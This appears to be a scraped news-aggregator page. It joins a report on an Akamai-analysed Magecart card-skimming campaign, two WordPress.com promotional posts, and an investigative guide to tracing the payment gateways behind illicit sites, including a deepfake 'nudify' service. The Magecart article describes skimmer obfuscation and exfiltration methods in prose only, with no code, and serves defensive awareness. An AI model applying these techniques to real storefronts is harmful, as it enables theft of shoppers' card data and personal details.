Connect with us

WORDPRESS

Researchers Spot a Different Kind of Magecart Card-Skimming Campaign

Published

on

Researchers Spot a Different Kind of Magecart Card-Skimming Campaign

An attacker under the Magecart umbrella has infected an unknown number of e-commerce sites in the US, UK, and five other countries with malware for skimming credit card numbers and personally identifiable information (PII) belonging to people making purchases on these sites. But in a new wrinkle, the threat actor is also using the same sites as hosts for delivering the card-skimming malware to other target sites.

Researchers from Akamai who spotted the ongoing campaign note that this not only makes the campaign different from prior Magecart activity, but it’s also much more dangerous.

They assess that the cyberattacks have been going on for at least one month and have potentially affected tens of thousands of people already. Akamai said that in addition to the US and UK, it has spotted websites affected by the campaign in Brazil, Spain, Estonia, Australia, and Peru.

Payment Card Theft & More: A Double Compromise

Magecart is a loose collective of cybercriminal groups involved in online payment card-skimming attacks. Over the past several years, these groups have injected their namesake card skimmers into tens of thousands of sites worldwide — including sites such as TicketMaster and British Airways —and stolen millions of credit cards from them, which they have then monetized in different ways. 

Akamai counted Magecart attacks on 9,200 e-commerce sites last year, of which 2,468 remained infected as of the end of 2022.

The typical modus operandi for these groups has been to surreptitiously inject malicious code into legitimate e-commerce sites — or into third-party components such as trackers and shopping carts — that the sites use, by exploiting known vulnerabilities. When users enter credit card information and other sensitive data on the checkout page of compromised websites, the skimmers silently intercept the data and send it to a remote server. So far, attackers have primarily targeted sites running the open source Magento e-commerce platform in Magecart attacks.

Advertisement

The latest campaign is slightly different in that the attacker is not just injecting a Magecart card skimmer into target sites but is also hijacking many of them to distribute malicious code. 

“One of the primary advantages of utilizing legitimate website domains is the inherent trust that these domains have built over time,” according to the Akamai analysis. “Security services and domain scoring systems typically assign higher trust levels to domains with a positive track record and a history of legitimate use. As a result, malicious activities conducted under these domains have an increased chance of going undetected or being treated as benign by automated security systems.”

In addition, the attacker behind the latest operation has also been attacking sites running not just Magento but other software, such as WooCommerce, Shopify, and WordPress.

A Different Approach, Same Outcome

“One of the most notable parts of the campaign is the way the attackers set up their infrastructure to conduct the web skimming campaign,” Akamai researcher Roman Lvovsky wrote in the blog post. “Before the campaign can start in earnest, the attackers will seek vulnerable websites to act as ‘hosts’ for the malicious code that is used later on to create the web skimming attack.”

Akamai’s analysis of the campaign showed the attacker using multiple tricks to obfuscate the malicious activity. For example, instead of injecting the skimmer directly into a target website, Akamai found the attacker injecting a small JavaScript code snippet into its webpages that then fetched the malicious skimmer from a host website. 

The attacker designed the JavaScript loader to look like Google Tag Manager, Facebook Pixel tracking code, and other legitimate third-party services, so it becomes hard to spot. The operator of the ongoing Magecart-like campaign also has been using Base64 encoding to obfuscate the URLs of compromised websites hosting the skimmer. 

Advertisement

“The process of exfiltrating the stolen data is executed through a straightforward HTTP request, which is initiated by creating an IMG tag within the skimmer code,” Lvovsky wrote. “The stolen data is then appended to the request as query parameters, encoded as a Base64 string.”

As a sophisticated detail, Akamai also found code in the skimmer malware that ensured it did not steal the same credit card and personal information twice.

Source link

Keep an eye on what we are doing
Be the first to get latest updates and exclusive content straight to your email inbox.
We promise not to spam you. You can unsubscribe at any time.
Invalid email address

WORDPRESS

5 Hidden Features of WordPress.com – WordPress.com News

Published

on

By

5 Hidden Features of WordPress.com – WordPress.com News

Whether you’re a blogger, a developer, or fall somewhere between, you’re likely to discover something new and useful in this video.

Isn’t it amazing how you can learn new things about someone, even after years of knowing them? That’s how Jamie Marsland has felt in the last few weeks while diving deeper into WordPress.com’s capabilities. In today’s Build and Beyond video, he shares five incredible features built right into the platform that aren’t as well known as they should be. Whether you’re a blogger, a developer, or fall somewhere between, you’re likely to discover something new and useful. 

Ready to build on WordPress.com? Start a free trial today:


Join 4.7M other subscribers

Advertisement

Source link

Keep an eye on what we are doing
Be the first to get latest updates and exclusive content straight to your email inbox.
We promise not to spam you. You can unsubscribe at any time.
Invalid email address
Continue Reading

WORDPRESS

New WordPress.com Themes for March 2024 – WordPress.com News

Published

on

By

New WordPress.com Themes for March 2024 – WordPress.com News

Five of our favorite new themes.

The WordPress.com team is always working on new design ideas to bring your website to life. Check out the latest themes in our library, including great options for small businesses, sports fan, nostalgic bloggers, and more.


Feelin’ Good is a vibrant (to say the least!) blog theme with a bold vaporwave aesthetic. Its nostalgic atmosphere pays homage to the daring, over-the-top visual art and advertisements of the ’80s and early ’90s. We’ve combined a lot of elements that shouldn’t work together, but do. If you’re looking for a dynamic, attention-grabbing, eye-popping visual feast of a theme, try Feelin’ Good.

Advertisement

Click here to view a demo of this theme.


1711610762 938 New WordPresscom Themes for March 2024 – WordPresscom News

Low Fi is a simple blog theme featuring a narrow column layout that’s optimized for seamless browsing on mobile devices. With six style variations, you’re sure to find a palette you’re drawn to. Taking inspiration from the lo-fi beats music scene, the theme’s design cues, such as the square header image, offer a nod to album artwork.

The overall aesthetic is deliberately understated, with each element—from the muted color schemes to the textured background—crafted to evoke a sense of nostalgia and warmth.

Click here to view a demo of this theme.


1711610763 567 New WordPresscom Themes for March 2024 – WordPresscom News

Cakely is the ultimate WordPress theme designed specifically for passionate bakers, cake enthusiasts, and dessert lovers. Tailored for small businesses aiming to shine in the world of sweets, Cakely effortlessly combines style and functionality to showcase mouthwatering creations. Its vibrant pink color scheme exudes joy while maintaining a classy, clean layout with easy navigation. This theme ultimately strikes the perfect balance between professionalism and playfulness, making it an ideal choice for showcasing your delicious masterpieces.

Click here to view a demo of this theme.


New WordPresscom Themes for March 2024 – WordPresscom News

Treehouse is a carefree, fun, and friendly theme ideal for Woo stores selling children’s products. With its unlimited customization options, Treehouse enables you to set up an online shop with just a few clicks. Utilizing a soft color palette, playful design details, and simplified layouts, your site will attract a wide range of customers, from young parents to over-the-moon grandparents. This theme is fully responsive and cross-browser compatible.

Click here to view a demo of this theme.


New WordPresscom Themes for March 2024 – WordPresscom News

Major League Baseball’s 2024 season kicks off on Thursday, March 28. What better way to show your home team the love it deserves than with a baseball-themed fan site! With a somewhat old-school layout, this theme evokes some of the classic sports sites of the ’90s, back before fantasy leagues took over. The header and accent colors are customizable, ensuring that your favorite crew is properly saluted.

Click here to view a demo of this theme.

Advertisement

To install any of the above themes, click the name of the theme you like, which brings you right to the installation page. Then click the “Activate this design” button. You can also click “Open live demo,” which brings up a clickable, scrollable version of the theme for you to preview.

Premium themes are available to use at no extra charge for customers on the Explorer plan or above. Partner themes are third-party products that can be purchased for $79/year each.

You can explore all of our themes by navigating to the “Themes” page, which is found under “Appearance” in the left-side menu of your WordPress.com dashboard. Or you can click below:


Join 4.7M other subscribers

Advertisement

Source link

Keep an eye on what we are doing
Be the first to get latest updates and exclusive content straight to your email inbox.
We promise not to spam you. You can unsubscribe at any time.
Invalid email address
Continue Reading

WORDPRESS

How to Get Started: Investigating Payment Gateways Online

Published

on

By

How to Get Started: Investigating Payment Gateways Online

When investigating a website, app, or online shop, one of the key questions you may need to answer is ‘How are they making money?’ 

Investigating the financial transactions of an organisation can reveal details about its connections and funding. Furthermore, if the website or app is engaged in illicit transactions, tracing the payment gateway can help achieve accountability by identifying what sites they are using to earn money.   Bellingcat has looked into the payment processors in previous investigations on far-right merchandise, Britain’s far-right influencers, and non-consensual deepfake pornography.

Credit: Nicolas Guyonnet / Hans Lucas via Reuters Connect

Payment gateways are a technology that takes a customer’s payment information, checks it with their financial institution, verifies that the transaction is legitimate, and then completes the transaction. As explained by Forbes, online stores need a payment gateway to be able to facilitate payments. Companies including PayPal, Stripe, and Square are commonly used as a payment gateway for online purchases.

Most mainstream payment gateways (like Stripe and PayPal) prohibit their services from being used in illegal transactions including the sale of illegal drugs, the promotion of hate or racial intolerance, and non-consensual adult content. Finding evidence that someone is violating the Terms of Services of these companies – and how they are doing so- can lead to the closure of loopholes and accounts. It can also provide additional information about an organisation’s revenue streams. 

It is nearly impossible to conduct online transactions without a payment gateway. So it should be possible to find the payment gateway of an organisation earning money, even if it is not obvious at first. One resource that is extremely useful is Chrome’s built- in developer tools (other browsers also have similar tools). Below we’ll provide an overview of the tools to use and questions to ask when scrutinising payment systems. 

How are they Taking Payment?

For online transactions, you’ll typically see websites accept traditional forms of payment including credit cards, debit cards and, more recently, cryptocurrency. Since cryptocurrency is not subject to the same regulations as traditional financial systems, cryptocurrency is often used to process payments for illegal services. Since this does not need to be ‘hidden’, websites will usually disclose which currency they accept and how to transfer funds into a crypto wallet. There are other ways you can track funding through cryptocurrency, as discussed in this guide.

Advertisement

If none of the above apply?  Other sites that use a payment gateway will accept money directly via credit card payment,  bank transfer, or through peer-to-peer payment apps (i.e., PayPal, Cash App, Zelle). If this is the case, you should be able to identify the payment gateway being used. In the case of the peer-to-peer apps, these services may be used by businesses and not just individuals’ transactions. They also require a bank account or credit card to use them. It is helpful to view transaction options on both the mobile app and web browser, in case the options differ.  It is also worth checking the currency that payments are being taken in – if it is a US website taking payment in a foreign currency, that can also provide clues. Further, if a website is using different payment gateways depending on the currency, this can lead to additional leads in your investigation. Payment options may also change depending on what IP address you are using. In other words, setting your IP address in the UK and then changing it to the US may result in different payment gateway options.

Where are they Soliciting for Payment?

Organisations may solicit for payment via a website or a messaging app like Telegram. It is important to investigate all avenues where  payment is being requested as each method may provide different clues for your investigation. For example, for some of the AI deep fake services we investigated here we found that companies would accept different payment methods depending on how you tried to pay – via their website, via a web browser or via Telegram. Sellers may want to direct their users away from their website to more private forums such as Telegram to facilitate transactions and avoid detection.

Is the Organisation Trying to Hide How Payment is Taken?

For some sellers, using a mainstream payment gateway may  violate the terms of service of that company. To be able to use their services, these sellers may  try to hide the nature of their goods from the payment gateway company. 

A Walk Through Example

Some sites may not show their payment options without signing up first. 

This was the case with the Nudify.VIP site which offers non-consensual AI Deep Fake pornography.  

Initially, the website states that their services are free. 

Advertisement

“With our service you can undress any person in a photo absolutely FREE!” 

However, this is misdirection, as you are then prompted to log in or sign up. Only once you create an account do you discover that you need to pay to access the service and how much it costs.

After creating an account, we were presented with two options to pay, by card or crypto. 

You are then presented with an option to pay via crypto or via credit card, but it does not yet say what cards they accept or what payment gateway they use. 

Clicking through to ‘Go To Payment’ gives us a new screen that lets the user pay via credit card (ie MasterCard, Visa), a US Bank account (ie Wells Fargo, USAA), or through Cash App. 

There is no indication of the payment gateway they are using, but if we look at the URL on the checkout page, we can see that it no longer says that we are on a Nudify.VIP domain. This is a clue that users are being directed to the checkout page through another website. This method is used to hide the true source of purchases from payment gateway providers. There’s another clue  that the domain has changed- in the fine print at the bottom of the checkout page. Via the Checkout Page using either Cash App or credit card options, it discloses:

“By providing your card information, you allow aiphotos.art to charge your card for future payments in accordance with their terms.”

Advertisement

This is another clue that the payment gateway does not know this belongs to an AI Deep fake service Nudify.VIP.

Three checkout options for Nudify.VIP: credit card, US bank account, and Cash App.

Use Browser Developer Tools to Investigate Further

All modern browsers have some form of built-in developer tools. You can search online for your specific browser (e.g. Firefox, Chrome, Safari). If you are in Chrome, you can right-click anywhere on the screen to get a menu and an option to ‘Inspect.’ You can also use keyboard shortcuts which can vary between MacOS or Windows. For Windows, you can click CTRL + SHIFT + I and on MacOS you can click Option + Command + I on your keyboard. Any of these actions will open the developer tools which allows you to  view the code of a webpage (such as HTML, CSS, and Javascript). This should appear on the right-hand side of your screen. While developer tools are designed to check for bugs or errors in a website, you can use them in your investigation.

There should be a list of tabbed options for you to view on the top menu bar. Clicking on ‘Sources’ shows you all the resources that the website is using. 

This is a good place to start to look for any clues about what piece of code is being used in the checkout process.  In the example below, one of the listed sources on the page is titled ‘js.stripe.com.’



Source link

Keep an eye on what we are doing
Be the first to get latest updates and exclusive content straight to your email inbox.
We promise not to spam you. You can unsubscribe at any time.
Invalid email address
Continue Reading

Trending

Follow by Email
RSS